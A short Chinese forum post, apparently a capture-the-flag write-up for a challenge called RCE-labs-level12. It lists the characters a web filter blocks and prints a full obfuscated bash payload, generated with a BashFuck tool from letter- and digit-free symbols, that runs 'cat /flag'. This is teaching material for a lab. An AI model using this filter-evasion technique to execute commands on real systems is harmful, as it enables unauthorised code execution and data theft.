返回
1
0
RCE-labs-level12
iiice,2026-04-22 20:21
Plaintext
WAF:[A-Za-z0-9”%*+,-.\/:;=>?@[\]^'|&_~]题目中给出了waf掉的字符,因为数字和字母都被waf掉了,所以要构造五字符的payload命令
Plaintext
cat /flag打开BashFuck网站,输入cat /flag,生成的所有payload里要找到没有数字字符的(这里0和1也不可以)
Plaintext
${!#}<<<${!#}\<\<\<\$\'\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${##}${#}${#}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${#}))\\$(($((${##}<<${##}))#${##}${##}${##}${#}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${#}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${##}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${#}${#}${##}${##}))\'因为!号没有被waf所以该payload可行。
暂无回复。你的想法是什么?
GeeSec
商务合作
